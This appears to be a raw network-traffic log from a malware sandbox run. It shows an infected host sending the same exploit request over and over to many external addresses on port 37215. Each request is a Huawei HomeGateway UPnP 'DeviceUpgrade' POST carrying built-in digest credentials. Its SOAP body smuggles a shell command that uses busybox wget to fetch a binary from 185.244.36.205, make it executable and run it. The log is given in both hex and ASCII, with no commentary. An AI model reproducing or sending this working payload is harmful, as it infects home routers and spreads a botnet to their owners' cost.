                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1006192.168.2.1535148156.143.41.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928390980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1007192.168.2.1533204138.134.98.25437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928395987 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1008192.168.2.1547464181.189.74.23937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928411007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1009192.168.2.1556458102.151.116.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928462029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1010192.168.2.1558314157.174.48.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928467035 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1011192.168.2.1554224181.78.146.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928499937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1012192.168.2.1541182157.44.193.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928499937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1013192.168.2.155527231.82.252.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928500891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1014192.168.2.154720231.192.204.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928507090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1015192.168.2.1533218102.17.5.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928535938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1016192.168.2.155793694.255.217.23137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928559065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
